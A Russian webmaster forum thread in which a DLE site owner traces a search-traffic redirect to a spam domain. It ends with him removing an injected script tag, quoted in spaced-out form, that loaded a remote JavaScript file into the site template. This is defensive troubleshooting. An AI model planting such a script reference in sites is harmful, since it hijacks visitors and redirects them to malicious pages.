Редирект всех поисковых переходов
Страницы: 1
Редирект всех поисковых переходов
Я сначала подумал, что метрика опять тупит, но и ЛИ показывает заметное снижение поисковых переходов (падение примерно в 300 раз smile:) ). Проблема в том, что по непонятным мне причинам при переходе на сайт с любой поисковой системы каким то образом перебрасывается на другой сайт. Причем ладно бы на нормальный сайт перекидывало, а там на какую-то ошибку природы с нулем в графе проиндексированных Гуглом страниц. Скорее всего это скрипт каким-то волшебным образом попал либо в index.php, либо в main.tpl. Я с редиректом никогда не работал, поэтому прошу совета: что мне вообще искать и где?
Мой сайт: _http://fifa-tournament.ru/ (кстати с прямого захода редирект не работает - только с поисковиков)
Сайт редиректа: _http://shara.searchlots-all.ru (при переходе, получается примерно такое: _http://shara.searchlots-all.ru/results.php?notds=1&query=%D0%A2%D1%83%D1%80%D0%BD%D0%B8%D1%80%D1%8B%20%D0%BF%D0%BE%20FIFA )
Движок: DLE
Изменено: hich_nick - 3 Июля 2011 18:28

Бесплатная контекстная реклама

С ПС попробывал перейти,все отлично переходит. Посмотри файл host свой,может чтото там, и только у тебя так. smile:confused:
Цитата
DEMON1705 пишет:
С ПС попробывал перейти,все отлично переходит

Не может быть только у меня. Позавчера было 300+ переходов с ПС, а сегодня 3 (и то только с google/images). Страницы на месте, да и не могли меня забанить в один день Гугл, Яндекс, Маил и даже Нигма smile:mocking:

Цитата
DEMON1705 пишет:
Посмотри файл host свой,может чтото там, и только у тебя так

Можно по-подробнее, где его найти?
hich_nick, у вас редиректит при переходе с Гугл и Яндекса (значит с любой известной ПС). Читайте эту тему, там такая же ситуация, как у Вас:

Код
http://www.cy-pr.com/forum/f21/t9393/


hosts тут совершенно не при чем
Изменено: hebroid - 3 Июля 2011 18:40
Цитата
hebroid пишет:
hich_nick , у вас редиректит при переходе с Гугл и Яндекса (значит с любой известной ПС). Читайте эту тему, там такая же ситуация, как у Вас:
Код
http://www.cy-pr.com/forum/f21/t9393/

Спасибо, почитаю.
Крабик, спасибо за ссылочу. Удалил из main.tpl вот такую вещь: "<sc ript src=ht tp://promed iagroup.ru/d. js></scr ipt>" и все стало впорядке.

А нет, теперь в подвале выскакивает ошибка: "Fatal error: Call to a member function return_links() on a non-object in АДРЕСФТП/public_html/index.php(271) : eval()'d code on line 1023"
Изменено: hich_nick - 3 Июля 2011 19:16
и что теперь делать? main.tpl насколько я понял это один из файлов темы. Может тогда найти эту тему и скопировать оттуда main.tpl?

Ничего же не выскакивает...исправили?
Изменено: hebroid - 3 Июля 2011 19:55
Цитата
hebroid пишет:
Ничего же не выскакивает...исправили?

Да, исправил. Спасибо, крабик smile;)
Доброе слово и хеадкрабу приятно smile:o
Изменено: hebroid - 3 Июля 2011 20:05
Страницы: 1
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
15:58 22 августа 2017 апдейт 
15:42 Переход на https 
15:27 Adsense личный опыт 
13:29 Adwad - новая CPA сеть без холда 
12:57 Как закрыть от индексации определенные урлы? 
12:35 Отзывы на Google maps 
09:52 Контент из вебархива - яндекс начал индексировать вебархив? 
15:27 Вечные ссылки с ТОПОВЫХ ресурсов! Размещение вечных трастовых ссылок с тИЦ от + 1000 до +45000 
15:18 Букмекерская контора (стоит парсер линии ставок) 
13:43 Статейное наполнение форумов женской тематики 
13:21 Комплексная раскрутка сайтов. Качественные услуги, прогоны и прочее. (3000+ отзывов) 
11:22 Сервис услуг в YouTube, Вконтакте, Instagram, Twitter, Facebook, Одноклассники, Google+ 
10:44 Требуется спамер 
09:21 Гиф изображения 
15:48 С какого потолка берут цену seo компании 
13:57 Карта скроллинга дала сбой Яндекс.Вебмастер 
13:55 Интересный развод 
13:08 Продажа квартир в многоквартирном доме 
10:49 target. my. com и как с ним бороться 
09:19 Для тех, у кого есть сайты ИГРОВОЙ тематики. Заходите) 
08:44 Быстрый загон ссылок